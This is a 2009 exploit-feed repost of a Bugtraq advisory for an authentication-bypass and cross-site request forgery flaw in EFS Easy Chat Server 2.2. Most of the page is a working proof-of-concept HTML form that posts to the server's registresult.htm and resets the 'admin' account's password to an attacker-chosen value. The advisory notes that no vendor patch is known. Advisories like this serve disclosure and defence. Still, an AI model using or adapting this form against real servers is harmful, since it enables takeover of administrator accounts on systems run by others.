|
Feeds -
Exploits
|
|
Written by Mountassif Moad
|
|
Wednesday, 04 March 2009 21:57 |
EFS Software Easy Chat Server 'registresult.htm' Authentication Bypass Vulnerability
-\\Bugtraq ID:
33967
-\\Class:
Access Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 03 2009 12:00AM
-\\Updated:
Mar 04 2009 02:16PM
-\\Credit:
Mountassif Moad
-\\Vulnerable:
EFS Software Easy Chat Server 2.2
-\\Discussion
EFS Software Easy Chat Server is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks.
Attackers can exploit this vulnerability to gain unauthorized access to the affected application, which may aid in further attacks.
Easy Chat Server 2.2 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
Attackers can exploit this issue via a browser.
The following exploit is available:
===============================================================
33967.html
^^^^^^^^^^^
<HTML>
<!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
<HEAD>
<TITLE>EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability</TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://www.example.com/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
<TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
</TR>
<TR>
<TD> Username:
<INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30" value="stack"> *
</TD></TR>
<TR>
<TD> Confirm Password:
<INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
<BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba</TEXTAREA>
</TD></TR>
<TR><TD align="center">
<INPUT type="submit" value="Click here to test" name=submit1>
<INPUT type="button" value="Close" name=button1 onclick="window.close();">
</TD></TR>
</form></TABLE>
</div>
<script language="JavaScript">
</script>
</BODY>
</HTML>
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Easy Chat Software Home Page
http://www.echatserver.com/index.ht (EFS Software)
|
